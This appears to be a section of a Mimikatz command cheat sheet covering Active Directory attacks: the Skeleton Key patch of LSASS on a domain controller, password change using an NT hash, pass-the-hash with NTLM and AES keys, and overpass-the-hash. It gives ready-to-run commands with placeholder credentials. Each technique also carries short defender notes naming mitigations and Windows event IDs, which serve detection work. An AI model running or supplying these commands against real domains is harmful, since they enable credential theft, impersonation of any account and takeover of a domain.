Advanced Techniques
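Skeleton Key Attack
# Install skeleton key: patches LSASS in memory on the domain controller.
# The patch is not persistent and is cleared when the DC reboots.
# Defender note: running LSASS as a protected process (RunAsPPL) and alerting on
# unexpected LSASS process access on domain controllers are the main mitigations.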
misc::skeleton
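# Authenticate as any user: once the key is installed, every domain account accepts
# the master password "mimikatz" in addition to its real password, which keeps working.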
net use \\dc01\c$ /user:Administrator mimikatz
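Password Change
# Change an account's password by supplying its current NT hash instead of the cleartext password.
# Defender note: the DC records this as a password-change attempt (event 4723) for the target account.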
lsadump::changentlm /user:Administrator /oldntlm:OLD_HASH /newntlm:NEW_HASH
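Pass-the-Hash Variants
# Classic PtH: starts the /run program in a new logon session that carries the supplied NT hash.
# Defender note: on the source host this appears as a 4624 logon with logon type 9 (NewCredentials).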
sekurlsa::pth /user:Administrator /domain:corp.local /ntlm:HASH /run:cmd.exe
# PtH with AES: same technique, supplying the account's AES256 Kerberos key instead of the NT hash
sekurlsa::pth /user:Administrator /domain:corp.local /aes256:AES_KEY /run:cmd.exe
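OverPass-the-Hash
# Convert NTLM to TGT: the command is the same as classic PtH above. The difference is what
# happens afterwards: when the spawned process accesses a Kerberos-authenticated service,
# Windows requests a TGT using the injected NT hash as the RC4 key.
# Defender note: a TGT request (event 4768) with encryption type 0x17 (RC4) for an account
# that normally uses AES is a detection signal.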
sekurlsa::pth /user:Administrator /domain:corp.local /ntlm:HASH /run:cmd.exe